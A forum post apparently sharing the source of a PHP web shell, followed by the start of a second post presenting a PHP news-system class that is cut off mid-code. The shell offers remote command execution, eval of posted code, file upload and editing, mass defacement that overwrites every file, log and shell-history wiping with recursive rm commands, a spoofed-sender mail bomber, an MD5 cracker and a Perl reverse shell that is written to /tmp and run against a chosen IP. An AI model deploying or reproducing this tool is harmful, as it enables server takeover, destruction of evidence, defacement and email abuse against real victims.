echo "<b>Safe Mode</b> : ON&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
}
if (get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on") {
echo "<b>Magic Quotes</b> : ON&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
} else {
echo "<b>Magic Quotes</b> : OFF&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
}
exec("perl -h",$perl);
if ($perl) {
echo "<b>Perl</b> : ON&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
} else {
echo "<b>Perl</b> : OFF&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
}
exec("wget --help",$wget);
if ($wget) {
echo "<b>WGET</b> : ON&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
} else {
echo "<b>WGET</b> : OFF&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
}
exec("curl_version",$curl);
if ($curl) {
echo "<b>CURL</b> : ON&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
} else {
echo "<b>CURL</b> : OFF&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
}

echo "</tr></td></table><br>";

echo "

<table>
<td class=main><a href=?dir=>Navigate</a></td><td class=main><a href=?cmd=>CMD</a></td>
<td class=main><a href=?upload=>Upload</a></td><td class=main><a href=?base64=>Base64</a></td>
<td class=main><a href=?phpconsole=>Eval</a></td><td class=main><a href=?info=>phpinfo</a></td>
<td class=main><a href=?bomber=>Mailer</a></td><td class=main><a href=?md5crack=>MD5Crack</a></td>
<td class=main><a href=?backshell>BackShell</a></td><td class=main><a href=?mass=>MassDefacement</a></td>
<td class=main><a href=?logs=>CleanLogs</a></td><td class=main><a href=?ftp=>FTP</a></td>
<td class=main><a href=?sql=>SQL</a></td><td class=main><a href=?cookiemanager=>Cookies</a></td>
<td class=main><a href=?sessionmanager=>Session</a></td>
<td class=main><a href=?chau=>Kill</a></td>
</table><br><br>
";




if(isset($_GET['perms'])) {
echo "
<form action='' method=POST>
File : <input type=text name=archivo value=".$_GET['perms'].">
<br>
Perms : <input type=text name=perms value=".dame($_GET['perms'])."
<br><br>
<input type=submit name=cambiarperms value=Change>
</form>
";
}
if (isset($_POST['cambiarperms'])) {
if (chmod($_POST['archivo'],$_POST['perms'])) {
echo "<script>alert('cHANGED');</script>";
} else {
echo "<script>alert('Error');</script>";
}
echo "<br><br><font color=red><center><a href=?reload=".$_POST['archivo'].">Atras</a><br><br></font></center>";
}

if (isset($_GET['ren'])) {
echo "
<form action='' method=POST>
File : <input type=text name=nombre value=".$_GET['ren']."><br>
Change to : <input type=text name=cambio><br><BR>
<input type=submit name=cambios value=Change><BR>
</form>
";
}

if (isset($_POST['cambios'])) {
if (@rename($_POST['nombre'],$_POST['cambio'])) {
echo "<script>alert('Changed');</script>";
} else {
echo "<script>alert('Error');</script>";
}
echo "<br><br><font color=red><center><a href=?reload=".$_POST['cambios'].">Atras</a><br><br></font></center>";
}



if (isset($_POST['crear1'])) {
chdir($_POST['dir']);
if (fopen($_POST['crear1'],"w")) {
echo "<script>alert('File cREATED');</script>";
}else {
echo "<script>alert('Error');</script>";
}
echo "<br><br><font color=red><center><a href=?reload=".$_POST['dir'].">Atras</a><br><br></font></center>";
}

if (isset($_POST['crear2'])) {
chdir($_POST['dir']);
if (@mkdir($_POST['crear2'],777)) {
echo "<script>alert('Directory created');</script>";
} else {
echo "<script>alert('Error');</script>";
}
echo "<br><br><font color=red><center><a href=?reload=".$_POST['dir'].">Atras</a><br><br></font></center>";
}


if (isset($_GET['del'])) {
$tipo  = filetype($_GET['del']);
if ($tipo == "dir") {
if (rmdir($_GET['del'])) {
echo "<script>alert('Directory Deleted');</script>";
} else { 
echo "<script>alert('Error');</script>";
}
} else {
if (unlink($_GET['del'])) {
echo "<script>alert('File Deleted');</script>";
} else {
echo "<script>alert('Error');</script>";
}
}
echo "<br><br><font color=red><center><a href=?reload=".$_GET['del'].">Atras</a><br><br></font></center>";
}

if (isset($_GET ['copiar'])) {
echo '
<form action="" method=POST>
File : <input type=text name=archivo value='.$_GET['copiar'].'><br>
Copy to : <input type=text name=nuevo><br><br>
<input type=submit name=copiado value=Copy><BR>
</form>
';
}

if (isset($_POST['copiado'])) {
if (copy($_POST['archivo'],$_POST['nuevo'])) {
echo "<script>alert('OK');</script>";
} else {
echo "<script>alert('Error');</script>";
}
echo "<br><br><font color=red><center><a href=?reload=".$_POST['archivo'].">Atras</a><br><br></font></center>";
}

if (isset($_GET['open'])) {
echo "<form action='' method=POST>";
echo "<center>";
echo "<textarea cols=80 rows=40 name=code>";
$archivo = file($_GET['open']);
foreach($archivo as $n=>$sub) {
$texto = htmlspecialchars($sub);
echo $texto;
}
echo "</center></textarea>";
echo "<br><br><center><input type=submit value=Save name=modificar></center><br><br>";
echo "</form>";
}

if (isset($_POST['modificar'])) {
$modi = fopen($_GET['open'],'w+');
if ($yeah = fwrite($modi,$_POST['code'])) {
echo "<script>alert('OK');</script>";
} else {
echo "<script>alert('Error');</script>";
}
echo "<br><br><font color=red><center><a href=?reload=".$_GET['open'].">Atras</a><br><br></font></center>";
}


if (isset($_GET['dir'])) {
if ($_GET['dir']=="") {
$path = getcwd();
chdir($path);
$dir = dir($path);
} else {
$path = $_GET['dir'];
chdir($path);
$dir = dir($path);
}
echo "
<br><br>
<form action='' method=GET>
<b>Directory</b> : <input type=text name=dir value=".$path."><input type=submit name=ir value=Navegar>
</form>
<br><br>
<form action='' method=POST>
<b>New File</b> : <input type=text name=crear1><input type=hidden name=dir value=".$dir->path."><input type=submit value=Crear>
</form>
<form action='' method=POST>
<b>New Directory</b> : <input type=text name=crear2><input type=hidden name=dir value=".$dir->path."><input type=submit value=Crear>
</form><br><br>
";
$archivos = array('dir'=>array(),'file'=>array());
while ($archivo = $dir->read()) {
$ver = @filetype($path.'/'.$archivo) ;
if ($ver=="dir") {
$archivos['dir'][] = $path.'/'.$archivo;
} else {
$archivos['file'][] = $path.'/'.$archivo;
}
}
$dir->rewind();
echo "<br><b>Directory Found</b> : ".count($archivos['dir'])."<br>";
echo "<b>Files Found</b> : ".count($archivos['file'])."<br><br><br>";
echo "<table bgcolor=#00FF00 border=1>";
echo "<tr>";
foreach ($archivos['dir'] as $dirs) {
$dirsx = pathinfo($dirs);
echo "<td width=100><a href=?dir=".$dirs.">".$dirsx['basename']."</a></td>";
echo "<td width=100><a href=?ren=".$dirs.">Move</a></td>";
echo "<td width=100><a href=?del=".$dirs.">Delete</a></td>";
echo "<td width=100><a href=?perms=".$dirs.">Perms</a></td>";
echo "<td width=100>--</td>";
echo "<td width=100>--</td>";
echo "</tr><tr>";
}
foreach ($archivos['file'] as $files) {
$filex = pathinfo($files);
echo "<td width=100><a href=?open=".$files.">".$filex['basename']."</a></td>";
echo "<td width=100><a href=?ren=".$files.">Move</a></td>";
echo "<td width=100><a href=?del=".$files.">Delete</a></td>";
echo "<td width=100><a href=?perms=".$files.">Perms</a></td>";
echo "<td width=100><a href=?copiar=".$files.">Copy</a></td>";
echo "<td width=100><a href=?down=".$files.">Download</a></td>";
echo "</tr><tr>";
}
echo "</table>";
}


if (isset($_GET['cmd'])) {
echo '
<form action="" method=POST>
Command : <input type=text name=comando size=50><input type=submit name=ejecutar value=Now>
</form>
';
}
if (isset($_POST['ejecutar'])) {
echo '
<br><br>Command<br><br>
<fieldset>
'.$_POST['comando'].'</fieldset>
<br><br>Result<br><br><fieldset>';
if (!system($_POST['comando'])) {
echo "<script>alert('Error loading command');</script>";
echo "Error";
}
echo "</fieldset><br><br>";
}

if (isset($_GET['upload'])) {
echo "<center><h2>Upload files</h2></center><center><br><br><br>";
echo '
<form enctype="multipart/form-data" action="" method=POST>
File : <input type=file name=archivo><br><br>	
Directory : <input type=text name=destino value='.getcwd().'>
<input type=submit value=Upload><br>
</form>';
if (isset($_FILES['archivo'])) {
$subimos = basename($_FILES['archivo']['name']);
if (move_uploaded_file($_FILES['archivo']['tmp_name'],$subimos)) {
if (copy($subimos,$_POST['destino']."/".$subimos)) { 
unlink($subimos);
echo "<script>alert('File uploaded');</script>";
}
} else {
echo "<script>alert('Error');</script>";
}
}
}

if (isset($_GET['base64'])) {
echo '
<form action="" method=POST>
Encode : <input type=text name=code size=50><input type=submit name=codificar value=Encode>
</form>
<form action="" method=POST>
Decode : <input type=text name=decode size=50><input type=submit name=decodificar value=Decode>
</form>
';
}
if (isset($_POST['codificar'])) {
echo "<br><br>Text<br><br><fieldset>".$_POST['code']."</fieldset><br><br>Result<br><br><fieldset>";
echo base64_encode($_POST['code'])	;
echo "</fieldset><br><br>";
}

if (isset($_POST['decodificar'])) {
echo "<br><br>Text<br><br><fieldset>".$_POST['decode']."</fieldset><br><br>Result<br><br><fieldset>";
echo base64_decode($_POST['decode']);
echo "</fieldset><br><br>";
}


if (isset($_GET['phpconsole'])) {
echo '
<form action="" method=POST>
Code : <input type=text name=codigo size="70"><input type=submit name=cargar value=OK>
</form>
';
}
if (isset($_POST['cargar'])) {
echo "<br><br>Code<br><br>
<fieldset>
".$_POST['codigo']."
</fieldset>
<br><br>
Result<br><br>
<fieldset>";

eval($_POST['codigo']);
echo "</fieldset>
";
}




if (isset($_GET['logs'])) {
echo '
<br><br><center><h3>Zapper</h3>
<br><br>
<form action="" method=GET>
<input type=submit name=clean value=Start>
</form></center>
<br><br>
';
}

if (isset($_GET['clean'])) {

$paths = array("/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access",
"/var/log/qmail", "/var/log/smtpd", "/var/log/samba","/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth");

$comandos  = array('find / -name *.bash_history -exec rm -rf {} \;' , 'find / -name *.bash_logout -exec rm -rf {} \;','find / -name log* -exec rm -rf {} \;','find / -name  *.log -exec rm -rf {} \;','unset HISTFILE','unset SAVEHIST');

foreach($paths as $path) {
if(@unlink($path)) {
echo $path.": Deleted<br>";
}
}
echo "<br><br>";
foreach($comandos as $comando) {
echo "Loading command : ".$comando."<br>";
system($comando);
}
}


if(isset($_GET['mass'])) {
echo "
<form action='' method=POST>
Directory to start : <input type=text name=dir value=".getcwd()."><br><br>
Code : <input type=text name=codigo size=70>
<input type=submit name=def value=Start>
</form>
";
}
if (isset($_POST['def'])) {
juntar($_POST['dir'],$_POST['codigo']);
}
function juntar ($dira,$text) {
$dir= opendir($dira);
while (!is_bool($archivos = readdir($dir))) {
if ($archivos != "..") {
if ($archivos != ".")  {
if ($archivos != basename($_SERVER['PHP_SELF'])) {
if (@filetype($dira."/".$archivos) == dir) {
juntar($dira."/".$archivos,$text);
} else {
echo "Deface : ".$dira."/".$archivos."<br>";
$solo = fopen($dira."\\".$archivos,"w");
$solo = fwrite($solo,$text);	
fclose($solo);
}}}}}} 	


if (isset($_GET['chau'])) {
if ($_GET['chau'] == "fuckit") {
echo "<br><br><h3>Kapoom !!!</h3><br><br>";
//unlink(basename($_SERVER['PHP_SELF']));
} else {
echo "<br><br><font color=red><h3><center>Acceso Denegado</center></h3></font><br><br>";
}
}



if (isset($_GET['bomber'])) {
echo "
<form action='' method=POST>
Target : <input type=text name=idiot [email protected]><br>
Fake mail : <input type=text name=falso><br>
Fake name : <input type=text name=nombrefalso><br>
Subject : <input type=text name=asunto><br>
Count : <input type=text name=count value=1><br>
Message : <input type=text name=mensaje size=60><br><br>
<br><input type=submit name=bombers value=Now>
</form>";
}

if (isset($_POST['bombers'])) {

$need .="MIME-Version: 1.0\n";
$need .="Content-type: text/html ; charset=iso-8859-1\n";
$need .="MIME-Version: 1.0\n";
$need .="From: ".$_POST['nombrefalso']." <".$_POST['falso'].">\n";
$need .="To: ".$_POST['nombrefalso']."<".$_POST['falso'].">\n";
$need .="Reply-To:".$_POST['falso']."\n";
$need .="X-Priority: 1\n";
$need .="X-MSMail-Priority:Hight\n";
$need .="X-Mailer:Widgets.com Server";


echo "<br><br><br><center><h2>Result</h2></center><br><br>";

for ($i = 1; $i <= $_POST['count']; $i++) {
if(@mail($_POST['idiot'],$_POST['asunto'],$_POST['mensaje'],$need)) {
echo "[+] Message <b>$i</b> Send<br>";
flush();
} else {
echo "[+] Message <b>$i</b> not Send<br>";
}}}

if (isset($_GET['md5crack'])) {

echo "

<form action='' method=POST
<b>Hash</b> : <input type=text name=md5 size=50><br><br>
<b>Salt</b> : <input type=text name=salto size=50><br>
<br><h3>Wordlist</h3>
<textarea cols=80 rows=40 name=code></textarea> 
<br><br>
<input type=submit value=Crack>
</form>
";

}

if (isset($_POST['md5'])) {
echo "<br><br><fieldset>";
echo "[+] Starting the search<br><br>";

$total = explode("\n",$_POST['code']);

foreach ($total as $linea){

$linea = chop($linea);

if (!empty($_POST['salto'])) {
$test = md5($linea.$_POST['salto']);
} else {
$test = md5($linea);
}

if ($test == $_POST['md5']) {
echo "<br>[+] Hash Cracked : ".$_POST['md5'].":".$linea."<br><br>";
exit(1);
} else {
echo "[+] : ".$_POST['md5']." != ".$linea."<br>";
}
}
echo "<br>[+] Finished<br>";
echo "</fieldset>";
}

if (isset($_GET['cookiemanager'])) {
echo "<h2>Cookies</h2><br><br>";
echo "[+] <b>Cookies Found</b> : ".count($_COOKIE)."<br><br>";  

echo "
<br><BR><form action='' method=POST>
New cookie : <input type=text name=cookienew><BR>
Value : <input type=text name=valor><BR><br>
<input type=submit value=Create><BR><br><br>
</form><br>";


echo "<table>";
echo "<td class=main><b>Name</b></td><td class=main><b>Value</b></td><tr>";

if (count($_COOKIE) != 0) {
foreach  ($_COOKIE as $nombre=>$valor) {
echo "<td class=main>".$nombre."</td><td class=main>".$valor."</td><tr>";
}
echo "</table>";
}

echo "<br><br>";
}

if (isset($_GET['sessionmanager'])) {

@session_start();

echo "<h2>Session</h2><br><br>";
echo "[+] <b>Sessions Found</b> : ".count($_SESSION)."<br><br>";  


echo "
<br><BR><form action='' method=POST>
New session : <input type=text name=sessionew><BR>
Value : <input type=text name=valor><BR><br>
<input type=submit value=Create><BR><br><br>
</form><br>";


if (count($_SESSION) != 0) {

echo "<table>";
echo "<td class=main><b>Name</b></td><td class=main><b>Value</b></td><tr>";

foreach  ($_SESSION as $nombre=>$valor) {
echo "<td class=main>".$nombre."</td><td class=main>".$valor."</td><tr>";
}
echo "</table>";
}
}

if (isset($_GET['ftp'])) {
echo "<h2>FTP Manager</h2><br><br>";
echo "

<form action='' method=GET>
Server : <input type=text name=serverftp value=127.0.0.1><br>
User : <input type=text name=user value=doddy><br>
Pass : <input type=text name=pass value=123><br><br><br>
<input type=hidden name=diar value=/>
<input type=submit value=Connect><br><br>
</form>
";

}
	
if (isset($_GET['renamenow'])) {

echo "

<form action='' method=GET>
File : <input type=text name=renamenowx value=".$_GET['renamenow']."><br>
New name : <input type=text name=newname><br><br>
<input type=hidden name=serverftp value=".$_GET['serverftp'].">
<input type=hidden name=user value=".$_GET['user'].">
<input type=hidden name=pass value=".$_GET['pass'].">
<input type=hidden name=diar value=".$_GET['diar'].">
<input type=submit value=Rename>
</form>
";
exit(1);
}


if (isset($_GET['renamenowx'])) {

$enter = ftp_connect($_GET['serverftp']);
$dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

if (ftp_rename($enter,$_GET['renamenowx'],$_GET['newname'])) {
echo "<script>alert('Changed');</script>";
echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>';
} else {
echo "<script>alert('Error');</script>";
}
}



if (isset($_GET['deletenow'])) {

$enter = ftp_connect($_GET['serverftp']);
$dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

if ($_GET['controla'] == "dir") {
if (@ftp_rmdir($enter,$_GET['deletenow'])) {
echo "<script>alert('Directory Deleted');</script>";
echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>';
} else {
echo "<script>alert('Error');</script>";
}

} else {

if (@ftp_delete($enter, $_GET['deletenow'])) {
echo "<script>alert('File Deleted');</script>";
echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>';
} else {
echo "<script>alert('Error');</script>";
}

}
}


if (isset($_GET['permsdown'])) {

echo "<form action='' method=GET>
File : <input type=text name=filetochange value=".$_GET['permsdown'].">
Perms : <input type=text name=pe value=0777 >
<input type=hidden name=serverftp value=".$_GET['serverftp'].">
<input type=hidden name=user value=".$_GET['user'].">
<input type=hidden name=pass value=".$_GET['pass'].">
<input type=submit value=Change>
</form>";
exit(1);
}

if (isset($_GET['filetochange'])) {

$enter = ftp_connect($_GET['serverftp']);
$dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

if (@ftp_chmod($enter,$_GET['pe'],$_GET['filetochange'])) {
echo "<script>alert('Changed');</script>";
} else {
echo "<script>alert('Error');</script>";
}

}


if (isset($_GET['serverftp'])) {

if ($enter = @ftp_connect("127.0.0.1")) {
if ($dentro = @ftp_login($enter,"doddy","123")) {
echo "<br><b>[+] Connected to server</b><br>";
} else {
echo "<br><b>[-] Error in the login</b><br><br>";
} 

echo "<b>[+] ONline</b><br><br><br>";

echo "

<form action='' method=GET>
Directory : <input type=text name=diar value=";
if (empty($_GET['diar'])) {
echo ftp_pwd($enter);
} else {
echo $_GET['diar'];
}

echo ">
<input type=hidden name=serverftp value=".$_GET['serverftp'].">
<input type=hidden name=user value=".$_GET['user'].">
<input type=hidden name=pass value=".$_GET['pass'].">

<input type=submit value=Load>
</form>
<br><br>
<form action='' method=GET>
New directory : <input type=text name=newdirftp><input type=submit value=Load>
<input type=hidden name=serverftp value=".$_GET['serverftp'].">
<input type=hidden name=user value=".$_GET['user'].">
<input type=hidden name=pass value=".$_GET['pass'].">
<input type=hidden name=diar value=".$_GET['diar'].">
</form>
<br><br>

<br><br>";

if (isset($_GET['diar'])) {

$enter = ftp_connect($_GET['serverftp']);
$dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

if (empty($_GET['diar'])) {

if (!$lista = ftp_nlist($enter.".")) {
echo "<script>alert('Error loading directory');</script>";
exit(1);
}

} else {

if (!$lista = ftp_nlist($enter,$_GET['diar'])) {
echo "<script>alert('Error loading directory');</script>";
exit(1);
}

}
}

echo "<table>";
foreach ($lista as $ver) {
echo "<td class=main>".$ver."</td>";

if (ftp_size($enter,ftp_pwd($enter).$ver) == -1) {

echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$ver.">Enter</a></td>";
echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar']."&renamenow=".$ver.">Rename</a></td>";
echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&controla=dir&diar=".$_GET['diar']."&deletenow=".$ver.">Delete</a></td>";
echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&permsdown=".$ver.">Perms</a></td>";
echo "<td class=main>--</a></td><tr>";

} else {

echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$ver.">--</a></td>";
echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar']."&renamenow=".$ver.">Rename</a></td>";
echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&controla=file&diar=".$_GET['diar']."&deletenow=".$ver.">Delete</a></td>";
echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&permsdown=".$ver.">Perms</a></td>";
echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar']."&downfile=".$ver.">Download</a></td><tr>";

}

}

echo "</table>";

} else {
echo "<b>[-] Error in the server</b><br><br>";
}
}


if (isset($_GET['downfile'])) {

$enter = ftp_connect($_GET['serverftp']);
$dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

$nuevo = fopen(basename($_GET['downfile']),'w');

if (ftp_fget($enter,$nuevo,$_GET['downfile'], FTP_ASCII, 0)) {
echo "<script>alert('File Download');</script>";
echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>';
} else {
echo "<script>alert('Error in the download');</script>";
}

ftp_close($enter);
fclose($nuevo);

}

if (isset($_GET['newdirftp'])) {

$enter = ftp_connect($_GET['serverftp']);
$dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

if (ftp_mkdir($enter,$_GET['diar'].$_GET['newdirftp'])) {
echo "<script>alert('Directory created');</script>";
echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>';
} else {
echo "<script>alert('Error');</script>";
}
}

if (isset($_GET['backshell'])) {

echo "

<form action='' method=GET>
IP : <input type=text name=ip value=".$_SERVER['REMOTE_ADDR']."><br>
Port : <input type=text name=port value=666><br><br>
Type : <select name=tipo>
<option>Perl</option>
</select>
<br><br><br>
<input type=submit value=Conectar>

";
}

if (isset($_GET['ip'])) {


if ($_GET['tipo']=="Perl") {

$code = ' 
#!usr/bin/perl
#Reverse Shell 0.1
#By Doddy H

use IO::Socket;

print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n";

unless (@ARGV == 2) { 
print "[Sintax] : $0 <host> <port>\n\n";
exit(1);
} else {
print "[+] Starting the connection\n";
print "[+] Enter in the system\n";
print "[+] Enjoy !!!\n\n";
conectar($ARGV[0],$ARGV[1]);
tipo();
}

sub conectar {

socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
system("export TERM=xterm;exec sh -i");
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}

# ¿ The End ?

';

$de = $_SERVER["HTTP_USER_AGENT"];

if(eregi("Win",$de)){
if ($test =  fopen("back.pl","w")) {
echo "<br><br><b>[+] Shell Created</b><br>";
} else {
echo "<br><br><b>[-] Error creating the shell</b><br>";
}
} else {

if ($test = fopen("/tmp/back.pl","w")) {
echo "<br><br><b>[+] Shell Created</b><br>";
} else {
echo "<br><br><b>[-] Error creating the shell</b><br>";
}

}

if (fwrite($test,$code)) {

if(eregi("Win",$de)){
if (chmod("back.pl",0777)) {
echo "<b>[+] Perms Changed<br></b>";
} else {
echo "<b>[-] Not priviligies to changed permissions</b><br>";
}
echo "<b>[+] Loading Shell</b><br><br><br>";
echo "<fieldset>";
if (!system("perl back.pl ".$_GET['ip']. " ".$_GET['port'])) {
echo "<script>alert('Error Loading Shell');</script>";
}
echo "</fieldset>";
} else {
if (chmod("/tmp/back.pl",0777)) {
echo "<b>[+] Perms Changed<br></b>";
} else {
echo "<b>[-] Not priviligies to changed permissions</b><br>";
}
echo "<b>[+] Loading Shell</b><br><br><br>";
echo "<fieldset>";
if (!system("cd /tmp;perl back.pl ".$_GET['ip']. " ".$_GET['port'])) {
echo "<script>alert('Error Loading Shell');</script>";
}
echo "</fieldset>";
}
} else {
echo "<br><b>[-] Error writing in the shell<br><br></b>";
}
}
}

if (isset($_GET['sql'])) {

echo "

<h2>SQL Manager</h2><br><br>

<form action='' method=GET>
Server : <input type=text name=host value=localhost><br>
User : <input type=text name=usuario value=root><br>
Pass : <input type=text name=password value=123><br><br>
<input type=submit name=entersql value=Connect>
</form>
";

}

if (isset($_GET['entersql'])) {

if ($mysql = @mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password'])) {
if ($databases = @mysql_list_dbs($mysql)) {
	
echo "<br><br><h2>Databases Found</h2><br>";
echo "<table>";
while($dat = @mysql_fetch_row($databases)) {
foreach($dat as $indice => $valor) {
echo  "<td class=main>$valor</td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&enterdb=".$valor.">Enter</a></td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&bajardb=".$valor.">Download</a></td><tr>";
}	
}
echo "</table>";
} else {
echo "<script>alert('Error loading databases');</script>";
exit(1);
}
} else {
echo "<script>alert('Error');</script>";
exit(1);
}
}

if (isset($_GET['enterdb'])) {

$mysql = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']);
mysql_select_db($_GET['enterdb']);
$tablas = mysql_query("show tables from ".$_GET['enterdb'])  or die("error");
echo "<br><h2>Tables Found</h2><br><br><table>";
while ($tabla = mysql_fetch_row($tablas)) {
foreach($tabla as $indice => $valor) {
echo "<td class=main>$valor</td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&entertable=".$valor."&condb=".$_GET['enterdb'].">Enter</a></td></td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&bajartabla=".$valor."&condb=".$_GET['enterdb'].">Download</a><tr>";
}	
}
echo "</table>";
}

if (isset($_GET['entertable'])) {

$mysql = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']);
mysql_select_db($_GET['condb']);

echo "<br><h2>SQL Manager</h2>
<br><br>
<form action='' method=POST>
Consulta SQL : <input type=text name=sentencia size=70>
<br><br><br>	
<input type=hidden name=host value=".$_GET['host'].">
<input type=hidden name=usuario value=".$_GET['usuario'].">
<input type=hidden name=password value=".$_GET['password'].">
<input type=hidden name=condb value=".$_GET['database'].">
<input type=hidden name=entertable value=".$_GET['tabla'].">
<input type=submit name=mostrar value=eNViar>
</form>
<br><br><br><br><br>";

$conexion = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']) or die("<h1>Error</h1>");
mysql_select_db($_GET['condb']);

if (isset($_POST['mostrar'])) {
if(!empty($_POST['sentencia'])) {
$resultado =  mysql_query($_POST['sentencia']);
} else {
$resultado = mysql_query("SELECT * FROM ".$_GET['entertable']);
}

$numer = 0;

echo "<table>";
for ($i=0;$i< mysql_num_fields($resultado);$i++) {
echo "<th class=main>".mysql_field_name($resultado,$i)."</th>";
$numer++;
}
while($dat = mysql_fetch_row($resultado)) {
echo "<tr>";
foreach($dat as $val) {
echo "<td class=main>".$val."</td>";
}
}
echo "</tr></table>";
}
}

echo "<br><br>";

} else {


echo "
<form action='' method=POST>
user : <input type=text name=user><br>
pass : <input type=text name=pass><br><br>
<input type=submit value=Login>
</form>
";

}

// ¿ The End ?

?>

Cualquier sugerencia o error digamenlo para mejorar

#329

Back-end / [PHP Class] Sistema de noticias By Doddy H

Julio 03, 2011, 09:51:40 PM

Hola a todos

Acabo de hacer mi segunda POO en php , se trata de un simple sistema
de noticias llamada "noticion" xDDD

Apararentemente es segura contra SQLI , y posee las siguientes funciones para manejar noticias

Conectar con la DB

Código: text


datos("server","user","pass","db","tabla","columna id","columna titulo","columna contenido","columna fecha")

Crear noticia con

Código: text


crear("id","titulo","contenido","fecha")

Eliminar noticia con
Código: text
```
eliminar("id de la noticia")
```
Ver contenido de noticia
Código: text
```
ver("id de la noticia")
```
Devuelve un array con el que pueden ver cada columna con sus datos

Modificar contenido de noticia

Código: text


mod("nuevo id","nuevo titulo","nuevo contenido","nueva fecha")

Eso seria todo

Codigo de noticion.php

Código: text


<?php

/*

Noticion 0.3

(c) DOddy Hackman 2010


Anti SQLI

*/


class noticion {


private $host;
private $db;
private $user;
private $pass;
private $tabla;
private $id;
private $titulo;
private $contenido;
private $fecha;
private $x_id;
private $x_titulo;
private $x_contenido;
private $_fecha;
private $tit;
private $con;
private $fech;



public function datos($host,$user,$pass,$db,$tabla,$id,$titulo,$contenido,$fecha) {
$this->host = $host;
$this->db = $db;
$this->user = $user;
$this->pass = $pass;
$this->tabla = $tabla;
$this->id = $id;
$this->titulo = $titulo;
